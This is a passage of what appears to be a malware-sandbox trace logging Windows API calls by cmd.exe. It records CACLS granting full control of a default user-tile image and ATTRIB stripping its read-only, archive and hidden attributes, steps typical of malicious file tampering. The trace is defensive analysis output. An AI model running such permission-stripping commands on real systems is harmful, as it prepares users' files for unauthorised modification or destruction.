lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0190.025] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0190.025] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0190.025] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0190.025] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0190.025] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0190.025] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0190.025] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0190.026] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0190.026] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0190.026] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0190.026] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0190.026] GetEnvironmentStringsW () returned 0x472458* [0190.026] FreeEnvironmentStringsW (penv=0x472458) returned 1 [0190.026] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0190.026] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0190.026] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0190.026] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0190.026] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0190.026] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0190.026] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0190.026] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0190.026] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 
[0190.026] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0190.026] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2ef880 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0190.026] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x2ef880, lpFilePart=0x2ef87c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x2ef87c*="Desktop") returned 0x18 [0190.026] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0190.026] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x2ef5fc | out: lpFindFileData=0x2ef5fc) returned 0x470ae8 [0190.026] FindClose (in: hFindFile=0x470ae8 | out: hFindFile=0x470ae8) returned 1 [0190.027] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x2ef5fc | out: lpFindFileData=0x2ef5fc) returned 0x470ae8 [0190.027] FindClose (in: hFindFile=0x470ae8 | out: hFindFile=0x470ae8) returned 1 [0190.027] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x2ef5fc | out: lpFindFileData=0x2ef5fc) returned 0x470ae8 [0190.027] FindClose (in: hFindFile=0x470ae8 | out: hFindFile=0x470ae8) returned 1 [0190.027] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0190.027] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0190.027] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0190.027] GetEnvironmentStringsW () returned 0x470308* [0190.027] FreeEnvironmentStringsW (penv=0x470308) returned 1 [0190.027] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0190.028] GetConsoleOutputCP () returned 0x1b5 [0190.028] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) 
returned 1 [0190.028] GetUserDefaultLCID () returned 0x409 [0190.028] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0190.028] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x2ef9c0, cchData=128 | out: lpLCData="0") returned 2 [0190.028] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x2ef9c0, cchData=128 | out: lpLCData="0") returned 2 [0190.028] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x2ef9c0, cchData=128 | out: lpLCData="1") returned 2 [0190.028] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0190.028] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0190.028] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0190.028] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0190.028] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0190.028] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0190.028] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0190.028] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0190.028] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0190.028] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0190.028] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0190.029] GetConsoleTitleW (in: lpConsoleTitle=0x4609b8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b 
[0190.029] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0190.029] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0190.029] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0190.030] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0190.030] GetEnvironmentVariableW (in: lpName="USERNAME", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="EEBsYm5") returned 0x7 [0190.031] _wcsicmp (_String1="CACLS", _String2=")") returned 58 [0190.031] _wcsicmp (_String1="FOR", _String2="CACLS") returned 3 [0190.031] _wcsicmp (_String1="FOR/?", _String2="CACLS") returned 3 [0190.031] _wcsicmp (_String1="IF", _String2="CACLS") returned 6 [0190.031] _wcsicmp (_String1="IF/?", _String2="CACLS") returned 6 [0190.031] _wcsicmp (_String1="REM", _String2="CACLS") returned 15 [0190.031] _wcsicmp (_String1="REM/?", _String2="CACLS") returned 15 [0190.034] _wcsicmp (_String1="ATTRIB", _String2=")") returned 56 [0190.034] _wcsicmp (_String1="FOR", _String2="ATTRIB") returned 5 [0190.034] _wcsicmp (_String1="FOR/?", _String2="ATTRIB") returned 5 [0190.034] _wcsicmp (_String1="IF", _String2="ATTRIB") returned 8 [0190.034] _wcsicmp (_String1="IF/?", _String2="ATTRIB") returned 8 [0190.034] _wcsicmp (_String1="REM", _String2="ATTRIB") returned 17 [0190.034] _wcsicmp (_String1="REM/?", _String2="ATTRIB") returned 17 [0190.036] GetConsoleTitleW (in: lpConsoleTitle=0x2ef654, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0190.036] _wcsicmp (_String1="CACLS", _String2="DIR") returned -1 [0190.036] _wcsicmp (_String1="CACLS", _String2="ERASE") returned -2 [0190.036] _wcsicmp (_String1="CACLS", _String2="DEL") returned -1 [0190.036] _wcsicmp (_String1="CACLS", _String2="TYPE") returned -17 [0190.036] _wcsicmp (_String1="CACLS", _String2="COPY") returned -14 [0190.036] _wcsicmp (_String1="CACLS", _String2="CD") returned -3 
[0190.036] _wcsicmp (_String1="CACLS", _String2="CHDIR") returned -7 [0190.036] _wcsicmp (_String1="CACLS", _String2="RENAME") returned -15 [0190.036] _wcsicmp (_String1="CACLS", _String2="REN") returned -15 [0190.036] _wcsicmp (_String1="CACLS", _String2="ECHO") returned -2 [0190.036] _wcsicmp (_String1="CACLS", _String2="SET") returned -16 [0190.036] _wcsicmp (_String1="CACLS", _String2="PAUSE") returned -13 [0190.036] _wcsicmp (_String1="CACLS", _String2="DATE") returned -1 [0190.036] _wcsicmp (_String1="CACLS", _String2="TIME") returned -17 [0190.036] _wcsicmp (_String1="CACLS", _String2="PROMPT") returned -13 [0190.036] _wcsicmp (_String1="CACLS", _String2="MD") returned -10 [0190.036] _wcsicmp (_String1="CACLS", _String2="MKDIR") returned -10 [0190.036] _wcsicmp (_String1="CACLS", _String2="RD") returned -15 [0190.036] _wcsicmp (_String1="CACLS", _String2="RMDIR") returned -15 [0190.036] _wcsicmp (_String1="CACLS", _String2="PATH") returned -13 [0190.036] _wcsicmp (_String1="CACLS", _String2="GOTO") returned -4 [0190.036] _wcsicmp (_String1="CACLS", _String2="SHIFT") returned -16 [0190.037] _wcsicmp (_String1="CACLS", _String2="CLS") returned -11 [0190.037] _wcsicmp (_String1="CACLS", _String2="CALL") returned -9 [0190.037] _wcsicmp (_String1="CACLS", _String2="VERIFY") returned -19 [0190.037] _wcsicmp (_String1="CACLS", _String2="VER") returned -19 [0190.037] _wcsicmp (_String1="CACLS", _String2="VOL") returned -19 [0190.037] _wcsicmp (_String1="CACLS", _String2="EXIT") returned -2 [0190.037] _wcsicmp (_String1="CACLS", _String2="SETLOCAL") returned -16 [0190.037] _wcsicmp (_String1="CACLS", _String2="ENDLOCAL") returned -2 [0190.037] _wcsicmp (_String1="CACLS", _String2="TITLE") returned -17 [0190.037] _wcsicmp (_String1="CACLS", _String2="START") returned -16 [0190.037] _wcsicmp (_String1="CACLS", _String2="DPATH") returned -1 [0190.037] _wcsicmp (_String1="CACLS", _String2="KEYS") returned -8 [0190.037] _wcsicmp (_String1="CACLS", _String2="MOVE") 
returned -10 [0190.037] _wcsicmp (_String1="CACLS", _String2="PUSHD") returned -13 [0190.037] _wcsicmp (_String1="CACLS", _String2="POPD") returned -13 [0190.037] _wcsicmp (_String1="CACLS", _String2="ASSOC") returned 2 [0190.037] _wcsicmp (_String1="CACLS", _String2="FTYPE") returned -3 [0190.037] _wcsicmp (_String1="CACLS", _String2="BREAK") returned 1 [0190.037] _wcsicmp (_String1="CACLS", _String2="COLOR") returned -14 [0190.037] _wcsicmp (_String1="CACLS", _String2="MKLINK") returned -10 [0190.037] _wcsicmp (_String1="CACLS", _String2="DIR") returned -1 [0190.037] _wcsicmp (_String1="CACLS", _String2="ERASE") returned -2 [0190.037] _wcsicmp (_String1="CACLS", _String2="DEL") returned -1 [0190.037] _wcsicmp (_String1="CACLS", _String2="TYPE") returned -17 [0190.037] _wcsicmp (_String1="CACLS", _String2="COPY") returned -14 [0190.037] _wcsicmp (_String1="CACLS", _String2="CD") returned -3 [0190.037] _wcsicmp (_String1="CACLS", _String2="CHDIR") returned -7 [0190.037] _wcsicmp (_String1="CACLS", _String2="RENAME") returned -15 [0190.037] _wcsicmp (_String1="CACLS", _String2="REN") returned -15 [0190.037] _wcsicmp (_String1="CACLS", _String2="ECHO") returned -2 [0190.037] _wcsicmp (_String1="CACLS", _String2="SET") returned -16 [0190.037] _wcsicmp (_String1="CACLS", _String2="PAUSE") returned -13 [0190.037] _wcsicmp (_String1="CACLS", _String2="DATE") returned -1 [0190.037] _wcsicmp (_String1="CACLS", _String2="TIME") returned -17 [0190.037] _wcsicmp (_String1="CACLS", _String2="PROMPT") returned -13 [0190.038] _wcsicmp (_String1="CACLS", _String2="MD") returned -10 [0190.038] _wcsicmp (_String1="CACLS", _String2="MKDIR") returned -10 [0190.038] _wcsicmp (_String1="CACLS", _String2="RD") returned -15 [0190.038] _wcsicmp (_String1="CACLS", _String2="RMDIR") returned -15 [0190.038] _wcsicmp (_String1="CACLS", _String2="PATH") returned -13 [0190.038] _wcsicmp (_String1="CACLS", _String2="GOTO") returned -4 [0190.038] _wcsicmp (_String1="CACLS", _String2="SHIFT") 
returned -16 [0190.038] _wcsicmp (_String1="CACLS", _String2="CLS") returned -11 [0190.038] _wcsicmp (_String1="CACLS", _String2="CALL") returned -9 [0190.038] _wcsicmp (_String1="CACLS", _String2="VERIFY") returned -19 [0190.038] _wcsicmp (_String1="CACLS", _String2="VER") returned -19 [0190.038] _wcsicmp (_String1="CACLS", _String2="VOL") returned -19 [0190.038] _wcsicmp (_String1="CACLS", _String2="EXIT") returned -2 [0190.038] _wcsicmp (_String1="CACLS", _String2="SETLOCAL") returned -16 [0190.038] _wcsicmp (_String1="CACLS", _String2="ENDLOCAL") returned -2 [0190.038] _wcsicmp (_String1="CACLS", _String2="TITLE") returned -17 [0190.038] _wcsicmp (_String1="CACLS", _String2="START") returned -16 [0190.038] _wcsicmp (_String1="CACLS", _String2="DPATH") returned -1 [0190.038] _wcsicmp (_String1="CACLS", _String2="KEYS") returned -8 [0190.038] _wcsicmp (_String1="CACLS", _String2="MOVE") returned -10 [0190.038] _wcsicmp (_String1="CACLS", _String2="PUSHD") returned -13 [0190.038] _wcsicmp (_String1="CACLS", _String2="POPD") returned -13 [0190.038] _wcsicmp (_String1="CACLS", _String2="ASSOC") returned 2 [0190.038] _wcsicmp (_String1="CACLS", _String2="FTYPE") returned -3 [0190.038] _wcsicmp (_String1="CACLS", _String2="BREAK") returned 1 [0190.038] _wcsicmp (_String1="CACLS", _String2="COLOR") returned -14 [0190.038] _wcsicmp (_String1="CACLS", _String2="MKLINK") returned -10 [0190.038] _wcsicmp (_String1="CACLS", _String2="FOR") returned -3 [0190.038] _wcsicmp (_String1="CACLS", _String2="IF") returned -6 [0190.038] _wcsicmp (_String1="CACLS", _String2="REM") returned -15 [0190.038] _wcsnicmp (_String1="CACL", _String2="cmd ", _MaxCount=0x4) returned -12 [0190.039] SetErrorMode (uMode=0x0) returned 0x0 [0190.039] SetErrorMode (uMode=0x1) returned 0x0 [0190.039] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x471e98, lpFilePart=0x2ef174 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x2ef174*="Desktop") returned 0x18 [0190.039] 
SetErrorMode (uMode=0x0) returned 0x1 [0190.039] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0190.039] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0190.044] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0190.045] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\CACLS.*", fInfoLevelId=0x1, lpFindFileData=0x2eeef0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2eeef0) returned 0xffffffff [0190.045] GetLastError () returned 0x2 [0190.045] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\CACLS", fInfoLevelId=0x1, lpFindFileData=0x2eeef0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2eeef0) returned 0xffffffff [0190.045] GetLastError () returned 0x2 [0190.046] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\CACLS.*", fInfoLevelId=0x1, lpFindFileData=0x2eeef0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2eeef0) returned 0x472180 [0190.046] FindClose (in: hFindFile=0x472180 | out: hFindFile=0x472180) returned 1 [0190.046] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.COM", fInfoLevelId=0x1, lpFindFileData=0x2eeef0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2eeef0) returned 0xffffffff [0190.046] GetLastError () returned 0x2 [0190.046] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.EXE", fInfoLevelId=0x1, lpFindFileData=0x2eeef0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2eeef0) returned 0x472180 [0190.046] FindClose (in: hFindFile=0x472180 | out: hFindFile=0x472180) returned 1 [0190.046] _wcsicmp 
(_String1=".EXE", _String2=".BAT") returned 3 [0190.046] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0190.046] GetConsoleTitleW (in: lpConsoleTitle=0x2ef3e8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0190.046] InitializeProcThreadAttributeList (in: lpAttributeList=0x2ef270, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x2ef338 | out: lpAttributeList=0x2ef270, lpSize=0x2ef338) returned 1 [0190.046] UpdateProcThreadAttribute (in: lpAttributeList=0x2ef270, dwFlags=0x0, Attribute=0x60001, lpValue=0x2ef330, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x2ef270, lpPreviousValue=0x0) returned 1 [0190.046] GetStartupInfoW (in: lpStartupInfo=0x2ef22c | out: lpStartupInfo=0x2ef22c*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0190.046] lstrcmpW (lpString1="\\cacls.exe", lpString2="\\XCOPY.EXE") returned -1 [0190.047] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cacls.exe", lpCommandLine="CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile40.bmp\" /E /G EEBsYm5:F /C ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x2ef2cc*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile40.bmp\" /E /G EEBsYm5:F /C ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2ef318 
| out: lpCommandLine="CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile40.bmp\" /E /G EEBsYm5:F /C ", lpProcessInformation=0x2ef318*(hProcess=0x50, hThread=0x4c, dwProcessId=0x248, dwThreadId=0x9cc)) returned 1 [0190.050] CloseHandle (hObject=0x4c) returned 1 [0190.050] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0190.050] GetEnvironmentStringsW () returned 0x470308* [0190.050] FreeEnvironmentStringsW (penv=0x470308) returned 1 [0190.050] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0190.080] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x2ef20c | out: lpExitCode=0x2ef20c*=0x0) returned 1 [0190.080] CloseHandle (hObject=0x50) returned 1 [0190.080] _vsnwprintf (in: _Buffer=0x2ef354, _BufferCount=0x13, _Format="%08X", _ArgList=0x2ef218 | out: _Buffer="00000000") returned 8 [0190.080] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0190.080] GetEnvironmentStringsW () returned 0x472410* [0190.080] FreeEnvironmentStringsW (penv=0x472410) returned 1 [0190.080] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0190.080] GetEnvironmentStringsW () returned 0x472410* [0190.080] FreeEnvironmentStringsW (penv=0x472410) returned 1 [0190.080] DeleteProcThreadAttributeList (in: lpAttributeList=0x2ef270 | out: lpAttributeList=0x2ef270) [0190.080] GetConsoleTitleW (in: lpConsoleTitle=0x2ef654, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0190.081] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0190.081] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0190.081] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: 
lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0190.081] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ATTRIB.*", fInfoLevelId=0x1, lpFindFileData=0x2eeef0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2eeef0) returned 0xffffffff [0190.081] GetLastError () returned 0x2 [0190.081] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ATTRIB", fInfoLevelId=0x1, lpFindFileData=0x2eeef0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2eeef0) returned 0xffffffff [0190.081] GetLastError () returned 0x2 [0190.081] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\ATTRIB.*", fInfoLevelId=0x1, lpFindFileData=0x2eeef0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2eeef0) returned 0x46e4d8 [0190.081] FindClose (in: hFindFile=0x46e4d8 | out: hFindFile=0x46e4d8) returned 1 [0190.081] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.COM", fInfoLevelId=0x1, lpFindFileData=0x2eeef0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2eeef0) returned 0xffffffff [0190.082] GetLastError () returned 0x2 [0190.082] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.EXE", fInfoLevelId=0x1, lpFindFileData=0x2eeef0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2eeef0) returned 0x46e4d8 [0190.082] FindClose (in: hFindFile=0x46e4d8 | out: hFindFile=0x46e4d8) returned 1 [0190.082] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0190.082] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0190.082] GetConsoleTitleW (in: lpConsoleTitle=0x2ef3e8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0190.082] InitializeProcThreadAttributeList (in: lpAttributeList=0x2ef270, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x2ef338 | out: lpAttributeList=0x2ef270, lpSize=0x2ef338) returned 1 
[0190.082] UpdateProcThreadAttribute (in: lpAttributeList=0x2ef270, dwFlags=0x0, Attribute=0x60001, lpValue=0x2ef330, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x2ef270, lpPreviousValue=0x0) returned 1 [0190.082] GetStartupInfoW (in: lpStartupInfo=0x2ef22c | out: lpStartupInfo=0x2ef22c*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0190.082] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0190.082] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile40.bmp\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x2ef2cc*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile40.bmp\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2ef318 | out: lpCommandLine="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile40.bmp\"", lpProcessInformation=0x2ef318*(hProcess=0x4c, hThread=0x50, dwProcessId=0x310, dwThreadId=0x848)) returned 1 [0190.084] CloseHandle (hObject=0x50) returned 1 [0190.084] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0190.084] GetEnvironmentStringsW () returned 0x472410* [0190.084] 
FreeEnvironmentStringsW (penv=0x472410) returned 1 [0190.084] WaitForSingleObject (hHandle=0x4c, dwMilliseconds=0xffffffff) returned 0x0 [0190.118] GetExitCodeProcess (in: hProcess=0x4c, lpExitCode=0x2ef20c | out: lpExitCode=0x2ef20c*=0x0) returned 1 [0190.118] CloseHandle (hObject=0x4c) returned 1 [0190.118] _vsnwprintf (in: _Buffer=0x2ef354, _BufferCount=0x13, _Format="%08X", _ArgList=0x2ef218 | out: _Buffer="00000000") returned 8 [0190.119] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0190.119] GetEnvironmentStringsW () returned 0x472410* [0190.119] FreeEnvironmentStringsW (penv=0x472410) returned 1 [0190.119] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0190.119] GetEnvironmentStringsW () returned 0x472410* [0190.119] FreeEnvironmentStringsW (penv=0x472410) returned 1 [0190.119] DeleteProcThreadAttributeList (in: lpAttributeList=0x2ef270 | out: lpAttributeList=0x2ef270) [0190.119] _get_osfhandle (_FileHandle=1) returned 0x7 [0190.119] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0190.119] _get_osfhandle (_FileHandle=1) returned 0x7 [0190.119] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0190.119] _get_osfhandle (_FileHandle=0) returned 0x3 [0190.119] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0190.119] SetConsoleInputExeNameW () returned 0x1 [0190.119] GetConsoleOutputCP () returned 0x1b5 [0190.119] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0190.119] SetThreadUILanguage (LangId=0x0) returned 0x409 [0190.120] exit (_Code=0) Process: id = "419" image_name = "cacls.exe" filename = "c:\\windows\\system32\\cacls.exe" page_root = "0x7ea16c20" os_pid = "0x248" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "418" os_parent_pid = "0x878" cmd_line = "CACLS \"C:\\Users\\All 
